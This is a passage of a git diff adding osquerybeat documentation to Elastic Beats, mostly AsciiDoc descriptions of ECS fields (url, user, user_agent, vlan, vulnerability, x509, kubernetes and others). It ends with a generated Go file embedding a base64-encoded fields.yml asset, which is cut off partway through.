+ +type: keyword + +example: https://www.elastic.co:443/search?q=elasticsearch#top + +-- + +*`url.full.text`*:: ++ +-- +type: text + +-- + +*`url.original`*:: ++ +-- +Unmodified original url as seen in the event source. +Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. +This field is meant to represent the URL as it was observed, complete or not. + +type: keyword + +example: https://www.elastic.co:443/search?q=elasticsearch#top or /search?q=elasticsearch + +-- + +*`url.original.text`*:: ++ +-- +type: text + +-- + +*`url.password`*:: ++ +-- +Password of the request. + +type: keyword + +-- + +*`url.path`*:: ++ +-- +Path of the request, such as "/search". + +type: keyword + +-- + +*`url.port`*:: ++ +-- +Port of the request, such as 443. + +type: long + +example: 443 + +format: string + +-- + +*`url.query`*:: ++ +-- +The query field describes the query string of the request, such as "q=elasticsearch". +The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. + +type: keyword + +-- + +*`url.registered_domain`*:: ++ +-- +The highest registered url domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`url.scheme`*:: ++ +-- +Scheme of the request, such as "https". +Note: The `:` is not part of the scheme. 
+ +type: keyword + +example: https + +-- + +*`url.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`url.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`url.username`*:: ++ +-- +Username of the request. + +type: keyword + +-- + +[float] +=== user + +The user fields describe information about the user that is relevant to the event. +Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. + + +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. 
+ +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +*`user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. 
+Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +*`user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.name.text`*:: ++ +-- +type: text + +-- + +*`user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. 
+ +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== user_agent + +The user_agent fields normally come from a browser request. +They often show up in web service logs coming from the parsed user agent string. + + +*`user_agent.device.name`*:: ++ +-- +Name of the device. + +type: keyword + +example: iPhone + +-- + +*`user_agent.name`*:: ++ +-- +Name of the user agent. + +type: keyword + +example: Safari + +-- + +*`user_agent.original`*:: ++ +-- +Unparsed user_agent string. + +type: keyword + +example: Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 + +-- + +*`user_agent.original.text`*:: ++ +-- +type: text + +-- + +*`user_agent.os.family`*:: ++ +-- +OS family (such as redhat, debian, freebsd, windows). 
+ +type: keyword + +example: debian + +-- + +*`user_agent.os.full`*:: ++ +-- +Operating system name, including the version or code name. + +type: keyword + +example: Mac OS Mojave + +-- + +*`user_agent.os.full.text`*:: ++ +-- +type: text + +-- + +*`user_agent.os.kernel`*:: ++ +-- +Operating system kernel version as a raw string. + +type: keyword + +example: 4.4.0-112-generic + +-- + +*`user_agent.os.name`*:: ++ +-- +Operating system name, without the version. + +type: keyword + +example: Mac OS X + +-- + +*`user_agent.os.name.text`*:: ++ +-- +type: text + +-- + +*`user_agent.os.platform`*:: ++ +-- +Operating system platform (such centos, ubuntu, windows). + +type: keyword + +example: darwin + +-- + +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + +*`user_agent.os.version`*:: ++ +-- +Operating system version as a raw string. + +type: keyword + +example: 10.14.1 + +-- + +*`user_agent.version`*:: ++ +-- +Version of the user agent. + +type: keyword + +example: 12.0 + +-- + +[float] +=== vlan + +The VLAN fields are used to identify 802.1q tag(s) of a packet, as well as ingress and egress VLAN associations of an observer in relation to a specific packet or connection. +Network.vlan fields are used to record a single VLAN tag, or the outer tag in the case of q-in-q encapsulations, for a packet or connection as observed, typically provided by a network sensor (e.g. Zeek, Wireshark) passively reporting on traffic. +Network.inner VLAN fields are used to report inner q-in-q 802.1q tags (multiple 802.1q encapsulations) as observed, typically provided by a network sensor (e.g. 
Zeek, Wireshark) passively reporting on traffic. Network.inner VLAN fields should only be used in addition to network.vlan fields to indicate q-in-q tagging. +Observer.ingress and observer.egress VLAN values are used to record observer specific information when observer events contain discrete ingress and egress VLAN information, typically provided by firewalls, routers, or load balancers. + + +*`vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +[float] +=== vulnerability + +The vulnerability fields describe information about a vulnerability that is relevant to an event. + + +*`vulnerability.category`*:: ++ +-- +The type of system or architecture that the vulnerability affects. These may be platform-specific (for example, Debian or SUSE) or general (for example, Database or Firewall). For example (https://qualysguard.qualys.com/qwebhelp/fo_portal/knowledgebase/vulnerability_categories.htm[Qualys vulnerability categories]) +This field must be an array. + +type: keyword + +example: ["Firewall"] + +-- + +*`vulnerability.classification`*:: ++ +-- +The classification of the vulnerability scoring system. For example (https://www.first.org/cvss/) + +type: keyword + +example: CVSS + +-- + +*`vulnerability.description`*:: ++ +-- +The description of the vulnerability that provides additional context of the vulnerability. For example (https://cve.mitre.org/about/faqs.html#cve_entry_descriptions_created[Common Vulnerabilities and Exposure CVE description]) + +type: keyword + +example: In macOS before 2.12.6, there is a vulnerability in the RPC... + +-- + +*`vulnerability.description.text`*:: ++ +-- +type: text + +-- + +*`vulnerability.enumeration`*:: ++ +-- +The type of identifier used for this vulnerability. 
For example (https://cve.mitre.org/about/) + +type: keyword + +example: CVE + +-- + +*`vulnerability.id`*:: ++ +-- +The identification (ID) is the number portion of a vulnerability entry. It includes a unique identification number for the vulnerability. For example (https://cve.mitre.org/about/faqs.html#what_is_cve_id)[Common Vulnerabilities and Exposure CVE ID] + +type: keyword + +example: CVE-2019-00001 + +-- + +*`vulnerability.reference`*:: ++ +-- +A resource that provides additional information, context, and mitigations for the identified vulnerability. + +type: keyword + +example: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6111 + +-- + +*`vulnerability.report_id`*:: ++ +-- +The report or scan identification number. + +type: keyword + +example: 20191018.0001 + +-- + +*`vulnerability.scanner.vendor`*:: ++ +-- +The name of the vulnerability scanner vendor. + +type: keyword + +example: Tenable + +-- + +*`vulnerability.score.base`*:: ++ +-- +Scores can range from 0.0 to 10.0, with 10.0 being the most severe. +Base scores cover an assessment for exploitability metrics (attack vector, complexity, privileges, and user interaction), impact metrics (confidentiality, integrity, and availability), and scope. For example (https://www.first.org/cvss/specification-document) + +type: float + +example: 5.5 + +-- + +*`vulnerability.score.environmental`*:: ++ +-- +Scores can range from 0.0 to 10.0, with 10.0 being the most severe. +Environmental scores cover an assessment for any modified Base metrics, confidentiality, integrity, and availability requirements. For example (https://www.first.org/cvss/specification-document) + +type: float + +example: 5.5 + +-- + +*`vulnerability.score.temporal`*:: ++ +-- +Scores can range from 0.0 to 10.0, with 10.0 being the most severe. +Temporal scores cover an assessment for code maturity, remediation level, and confidence. 
For example (https://www.first.org/cvss/specification-document) + +type: float + +-- + +*`vulnerability.score.version`*:: ++ +-- +The National Vulnerability Database (NVD) provides qualitative severity rankings of "Low", "Medium", and "High" for CVSS v2.0 base score ranges in addition to the severity ratings for CVSS v3.0 as they are defined in the CVSS v3.0 specification. +CVSS is owned and managed by FIRST.Org, Inc. (FIRST), a US-based non-profit organization, whose mission is to help computer security incident response teams across the world. For example (https://nvd.nist.gov/vuln-metrics/cvss) + +type: keyword + +example: 2.0 + +-- + +*`vulnerability.severity`*:: ++ +-- +The severity of the vulnerability can help with metrics and internal prioritization regarding remediation. For example (https://nvd.nist.gov/vuln-metrics/cvss) + +type: keyword + +example: Critical + +-- + +[float] +=== x509 + +This implements the common core fields for x509 certificates. This information is likely logged with TLS sessions, digital signatures found in executable binaries, S/MIME information in email bodies, or analysis of files on disk. +When the certificate relates to a file, use the fields at `file.x509`. When hashes of the DER-encoded certificate are available, the `hash` data set should be populated as well (e.g. `file.hash.sha256`). +Events that contain certificate information about network connections, should use the x509 fields under the relevant TLS fields: `tls.server.x509` and/or `tls.client.x509`. + + +*`x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +*`x509.issuer.common_name`*:: ++ +-- +List of common name (CN) of issuing certificate authority. 
+ +type: keyword + +example: Example SHA2 High Assurance Server CA + +-- + +*`x509.issuer.country`*:: ++ +-- +List of country (C) codes + +type: keyword + +example: US + +-- + +*`x509.issuer.distinguished_name`*:: ++ +-- +Distinguished name (DN) of issuing certificate authority. + +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`x509.issuer.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: Mountain View + +-- + +*`x509.issuer.organization`*:: ++ +-- +List of organizations (O) of issuing certificate authority. + +type: keyword + +example: Example Inc + +-- + +*`x509.issuer.organizational_unit`*:: ++ +-- +List of organizational units (OU) of issuing certificate authority. + +type: keyword + +example: www.example.com + +-- + +*`x509.issuer.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`x509.not_after`*:: ++ +-- +Time at which the certificate is no longer considered valid. + +type: date + +example: 2020-07-16 03:15:39+00:00 + +-- + +*`x509.not_before`*:: ++ +-- +Time at which the certificate is first considered valid. + +type: date + +example: 2019-08-16 01:40:25+00:00 + +-- + +*`x509.public_key_algorithm`*:: ++ +-- +Algorithm used to generate the public key. + +type: keyword + +example: RSA + +-- + +*`x509.public_key_curve`*:: ++ +-- +The curve used by the elliptic curve public key algorithm. This is algorithm specific. + +type: keyword + +example: nistp521 + +-- + +*`x509.public_key_exponent`*:: ++ +-- +Exponent used to derive the public key. This is algorithm specific. + +type: long + +example: 65537 + +Field is not indexed. + +-- + +*`x509.public_key_size`*:: ++ +-- +The size of the public key space in bits. + +type: long + +example: 2048 + +-- + +*`x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. 
For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. + +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`x509.signature_algorithm`*:: ++ +-- +Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. + +type: keyword + +example: SHA256-RSA + +-- + +*`x509.subject.common_name`*:: ++ +-- +List of common names (CN) of subject. + +type: keyword + +example: shared.global.example.net + +-- + +*`x509.subject.country`*:: ++ +-- +List of country (C) code + +type: keyword + +example: US + +-- + +*`x509.subject.distinguished_name`*:: ++ +-- +Distinguished name (DN) of the certificate subject entity. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`x509.subject.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: San Francisco + +-- + +*`x509.subject.organization`*:: ++ +-- +List of organizations (O) of subject. + +type: keyword + +example: Example, Inc. + +-- + +*`x509.subject.organizational_unit`*:: ++ +-- +List of organizational units (OU) of subject. + +type: keyword + +-- + +*`x509.subject.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`x509.version_number`*:: ++ +-- +Version of x509 format. + +type: keyword + +example: 3 + +-- + +[[exported-fields-host-processor]] +== Host fields + +Info collected for the host machine. + + + + +*`host.containerized`*:: ++ +-- +If the host is a container. + + +type: boolean + +-- + +*`host.os.build`*:: ++ +-- +OS build information. + + +type: keyword + +example: 18D109 + +-- + +*`host.os.codename`*:: ++ +-- +OS codename, if any. 
+ + +type: keyword + +example: stretch + +-- + +[[exported-fields-jolokia-autodiscover]] +== Jolokia Discovery autodiscover provider fields + +Metadata from Jolokia Discovery added by the jolokia provider. + + + +*`jolokia.agent.version`*:: ++ +-- +Version number of jolokia agent. + + +type: keyword + +-- + +*`jolokia.agent.id`*:: ++ +-- +Each agent has a unique id which can be either provided during startup of the agent in form of a configuration parameter or being autodetected. If autodected, the id has several parts: The IP, the process id, hashcode of the agent and its type. + + +type: keyword + +-- + +*`jolokia.server.product`*:: ++ +-- +The container product if detected. + + +type: keyword + +-- + +*`jolokia.server.version`*:: ++ +-- +The container's version (if detected). + + +type: keyword + +-- + +*`jolokia.server.vendor`*:: ++ +-- +The vendor of the container the agent is running in. + + +type: keyword + +-- + +*`jolokia.url`*:: ++ +-- +The URL how this agent can be contacted. + + +type: keyword + +-- + +*`jolokia.secured`*:: ++ +-- +Whether the agent was configured for authentication or not. 
+ + +type: boolean + +-- + +[[exported-fields-kubernetes-processor]] +== Kubernetes fields + +Kubernetes metadata added by the kubernetes processor + + + + +*`kubernetes.pod.name`*:: ++ +-- +Kubernetes pod name + + +type: keyword + +-- + +*`kubernetes.pod.uid`*:: ++ +-- +Kubernetes Pod UID + + +type: keyword + +-- + +*`kubernetes.namespace`*:: ++ +-- +Kubernetes namespace + + +type: keyword + +-- + +*`kubernetes.node.name`*:: ++ +-- +Kubernetes node name + + +type: keyword + +-- + +*`kubernetes.node.hostname`*:: ++ +-- +Kubernetes hostname as reported by the node’s kernel + + +type: keyword + +-- + +*`kubernetes.labels.*`*:: ++ +-- +Kubernetes labels map + + +type: object + +-- + +*`kubernetes.annotations.*`*:: ++ +-- +Kubernetes annotations map + + +type: object + +-- + +*`kubernetes.service.selectors.*`*:: ++ +-- +Kubernetes Service selectors map + + +type: object + +-- + +*`kubernetes.replicaset.name`*:: ++ +-- +Kubernetes replicaset name + + +type: keyword + +-- + +*`kubernetes.deployment.name`*:: ++ +-- +Kubernetes deployment name + + +type: keyword + +-- + +*`kubernetes.statefulset.name`*:: ++ +-- +Kubernetes statefulset name + + +type: keyword + +-- + +*`kubernetes.container.name`*:: ++ +-- +Kubernetes container name (different than the name from the runtime) + + +type: keyword + +-- + +*`kubernetes.container.image`*:: ++ +-- +Kubernetes container image + + +type: alias + +alias to: container.image.name + +-- + +[[exported-fields-osquerybeat]] +== Osquerybeat fields + +None + +[[exported-fields-process]] +== Process fields + +Process metadata fields + + + + +*`process.exe`*:: ++ +-- +type: alias + +alias to: process.executable + +-- +
diff --git a/x-pack/osquerybeat/docs/index.asciidoc b/x-pack/osquerybeat/docs/index.asciidoc
new file mode 100644
index 00000000000..3475e7d069c
--- /dev/null
+++ b/x-pack/osquerybeat/docs/index.asciidoc
@@ -0,0 +1,5 @@
+= {Beat} Docs
+
+Welcome to the {Beat} documentation.
+
+
diff --git a/x-pack/osquerybeat/include/fields.go b/x-pack/osquerybeat/include/fields.go
new file mode 100644
index 00000000000..7270d04fb3d
--- /dev/null
+++ b/x-pack/osquerybeat/include/fields.go
@@ -0,0 +1,23 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// Code generated by beats/dev-tools/cmd/asset/asset.go - DO NOT EDIT. + +package include + +import ( + "github.com/elastic/beats/v7/libbeat/asset" +) + +func init() { + if err := asset.SetFields("osquerybeat", "fields.yml", asset.BeatFieldsPri, AssetFieldsYml); err != nil { + panic(err) + } +} + +// AssetFieldsYml returns asset data. +// This is the base64 encoded gzipped contents of fields.yml. +func AssetFieldsYml() string { + return "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